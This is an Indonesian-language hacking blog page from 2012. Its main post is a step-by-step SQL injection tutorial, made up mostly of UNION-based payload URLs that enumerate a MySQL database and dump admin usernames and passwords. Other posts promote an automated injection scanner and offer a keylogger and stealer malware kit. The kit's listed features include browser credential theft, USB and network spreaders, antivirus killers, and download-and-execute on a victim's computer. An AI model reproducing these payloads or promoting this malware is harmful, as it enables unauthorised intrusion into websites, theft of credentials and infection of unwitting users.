Sabtu, 22 September 2012

Cara Hacking Website Dengan Teknik SQL Injection

Posted by Unknown 05.23, under , | No comments

Pengertian SQL Injection, SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.


Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]
  • Carilah target
    Misal: [site]/berita.php?id=100

    Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100' atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Step 2 ]
  • Mencari dan menghitung jumlah table yang ada dalam databasenya...
    gunakan perintah: order by

    Contoh:

    [site]/berita.php?id=-100+order+by+1-- atau
    [site]/berita.php?id=-100+order+by+1/*

    Ceklah secara step by step (satupersatu)...
    Misal:

    [site]/berita.php?id=-100+order+by+1--
    [site]/berita.php?id=-100+order+by+2--
    [site]/berita.php?id=-100+order+by+3--
    [site]/berita.php?id=-100+order+by+4--

    Sehingga muncul error atau hilang pesan error...
    Misal: [site]/berita.php?id=-100+order+by+9--

    Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8--
[ Step 3 ]
  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

    ok seumpama yg keluar angka 5

    gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

    Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

    Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Step 4 ]
  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

    Code:

    [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

    Se'umpama table yang muncul adalah "admin"
[ Step 5 ]
  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ​tables+where+table_schema=database()--
[ Step 6 ]
  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

    Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :

    http://www.v3n0m.net/ascii.htm

    Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--
[ Step 7 ]
  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara

    perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

    Contoh kata yang keluar adalah id,username,password

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
[ Step 8 ]
  • Tahap terakhir mencari halaman admin atau login.
Sekian postingan saya kali ini tentang Cara Hacking Website Dengan Teknik SQL Injection, tutorial hacking yang lain akan menyusul, Jadi mampir terus kesini ya :D

Cara mencari kelemahan website/situs

Posted by Unknown 05.03, under , | No comments

Cara mencari kelemahan website/situs | Jogjakarta-Cyber4rt
Kali ini saya akan berbagi tools untuk menguji dan mencari kelemahan website/situs, WebCruiser Web Vulnerability Scanner Enterprise v2.5.0, adalah sebuah perangkat lunak yang khusus dirancang untuk tujuan ini.
sayapun masih belajar menggunakan ini..jadi mari kita sharing hasilnya :)















WebCruiser Web Vulnerability Scanner adalah sebuah perangkat lunak penetrasi web yang efektif dan kuat yang akan membantu kita dalam mengaudit website/situs, juga memiliki scanner kerentanan dan sengkaian alat keamanan.
Mendukung pemindaian situs POC (Proof of concept) kerentanan situs seperti: SQL Injection, Cross Site Scripting, XPath Injection dll. juga, WebCruiser juga adalah sebuah alat SQL injection otomatis, XPath injection tool, dan Cross Site Scripting tool!
Apa itu WebCruiser?, WebCruiser adalah alat untuk:
  • SQL Injection Tool pertama untuk Windows 7, Windows Vista
  • Web Vulnerability Scanner
  • SQL Injection Scanner
  • Cross Site Scripting Scanner
  • XPath Injection Scanner
  • Automatic SQL Injection Tool (POC)
  • Cross Site Scripting Tool (POC)
  • XPath Injection Tool (POC)
  • Post Data Resend Tool
Fitur Webcruiser:
  • Crawler(Site Directori dan File)
  • Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection dll.
  • SQL Injection Scanner
  • SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept)
  • SQL Injection for SQL Server: PlainText/Union/Blind Injection
  • SQL Injection for MySQL: PlainText/Union/Blind Injection
  • SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection
  • SQL Injection for DB2: Union/Blind Injection
  • SQL Injection for Access: Union/Blind Injection
  • Post Data Resend
  • Cross Site Scripting Scanner and POC
  • XPath Injection Scanner and POC
  • Auto Get Cookie From Web Browser For Authentication
  • Report Output.
Download WebCruiser Web Vulnerability Scanner Enterprise v2.5.0

Download Game Land Of The Dead

Posted by Unknown 04.58, under | No comments

Download Game Land Of The Dead - Road To Fiddler's Green | Jogjakarta-Cyber4rt - Bagi kalian yang suka main game FPS bergenre horor, ngga ada salahnya mencoba game yang satu ini. Dalam game ini kalian ditugaskan membunuh zombie yang berkeliaran dimana-mana.

Source : Cirebon-Cyber4rt
Ukuran game ini tidak terlalu besar, sehingga dengan spesifikasi komputer/laptop yang standar pun masih bisa dengan lancar main game keren ini. Bagi kalian yang penasaran ingin mencoba bermain game Land Of The Dead ini, saya sudah siapkan link downloadnya dibawah ini :

Screenshot :
http://cirebon-cyber4rt.blogspot.com/2012/08/download-game-land-of-dead-road-to.html

http://cirebon-cyber4rt.blogspot.com/2012/08/download-game-land-of-dead-road-to.html

Rekomendasi Sistem Operasi :
  • Processor - Intel Pentium 4 @ 1.7GHz Atau Lebih Tinggi.
  • RAM - 512 MB Atau Lebih Tinggi.
  • HDD - 700 MB Tersedia.
  • VGA Memory - 128 MB Atau Lebih Tinggi.
  • DirectX - Versi 9.0c Atau Lebih Tinggi.
Download Link :
Cara Installisasi :
  1. Extract Land Of The Dead - Road o Fiddler's Green.rar
  2. Nanti akan muncul satu folder, lalu buka folder tersebut.
  3. Kemudian buka Setup.bat, tunggu Setup.bat hingga selesai.
  4. Buka folder yang telah di extract tadi,
  5. Masuk ke folder "System" dan buka LOTD
  6. Enjoy !
Walaupun ukuran game ini tidak terlalu besar, grafisnya cukup bagus kok. Kalo kalian pernah bermain GTA San Andreas, nah seperti itu grafisnya game ini.

Ok, Sekian dulu postingan saya kali ini tentang Download Game Land Of The Dead - Road To Fiddler's Green, Semoga dapat bermanfaat.

Unknown Logger V Public

Posted by Unknown 04.44, under , | No comments

 Unknown Logger V Public | Jogjakarta-Cyber4rt
Buat yang mau buat keylogger, ne saya kasih source codenya dapet dari forum luar ternama dengan berbagai fitur yg mumpuni.




yg mau lihat videonya di
http://www.youtube.com/watch?v=NZK6fxhPJyU&feature=player_embedded

Features:
1- Built in Stub
2- Get Tons of Information about the slave (Computer User, Computer Name, Computer Total Physical Memory, slave's IP Address, slave's Country, Date, etc...)
3- Send logs to SMTP Severs and FTP
4- SMTP (Hotmail, Gmail, AOL)
5- Test Mail Functionality (Hotmail, Gmail, AOL)
6- Test FTP Functionality
7- Continuously Send Logs without Fail
8- Custom Logs Sending Interval (Which means you Choose when the Logs are sent to you)
9- Logs Every Single Thing on the Keyboard (Letters(Up Cases and Low Cases) - Numbers - Symbols - Specific Keys ([F1], [F2], [Home], etc...))
10- Works on all Operating Systems (Window XP, Window Vista, Window 7 (32 and 64 bit)
11- Hide Functionality (Make the Server Invisible to the Naked eye)
12- Never Crashes in slave's Computer (Will always be working whatever happens)
13- Simple and Easy to use GUI
14- Customer Server Name
15- Sends Clean and Very Organized Logs
16- Can be Used as a Keylogger - Stealer - Worm - Spreader and more by just Checking Few Boxes

Spreaders:
1- USB Spreader
2- LAN Spreader
3- P2P Spreader
4- RAR Spreader

Stealers:
1- Firefox 4/5/6/7/8/9
2- Google Chrome All Versions
3- Opera All Versions
4- Internet Explorer 7/9 5- Steam Stealer
6- CD Keys (up to 300)

Anti Killers:
1- Anti Nod32 (All Versions) 2- Anti Kaspersky (All Versions) 3- Anti BitDefender (All Versions) 4- Anti MalwareBytes (All Versions) 5- Anti Norman (All Versions) 6- Anti WireShark (All Versions) 7- Anti Anubis (All Versions) 8- Anti KeyScrambler (All Versions) 9- Anti Ollydbg (All Versions) 10- Anti Outpost (All Versions) 11- Anti ZoneAlaram (All Versions)

Disablers:
1- Disable RUN 2- Disable Registry 3- Disable CMD 4- Disable Right Click 5- Disable Task Manager 6- Disable System Restore

Deleters:
1- Delete FireFox Cookies
2- Delete Google Chrome Cookies
3- Delete Internet Explorer Cookies

Download And Execute:
Add any Link that Leads to any kind of File and this File will be Downloaded and Execute Automatically and Anonymously

Webpage Loader:
Add any Link and it will be Automatically Loaded on the slave's PC

Fake Message:
Write any kind of Message and you can choose Any kinds of Types for it and it will Automatically Appear on the slave's Computer

Built Ins:
1- Icon Changer 2- File Pumper (the Server size will never change even if the Server was Zipped or Extracted)

Updates:
1- Screen Logger Bug Fixed
2- Logs Sending Bug Fixed
3- Stealers Bug Fixed
4- Yahoo SMTP Server removed
5- Hotmal SMTP Server Port Modified
6- Firefox 4/5/6/7/8/9 Stealer Bug Fixed

Credits:
1- The Unknown - Coder 2- Speed13 - Coder Assistant (That's my Teacher...) 3- Gogoli - (FF Stealer 4/5 - GC Stealer - Opera Stealer) 4- AeonHack - Theme 5- The Unknowns

Download :
http://twitter.com/#!/_The_Unknowns_ http://www.youtube.com/user/1TheUnknowns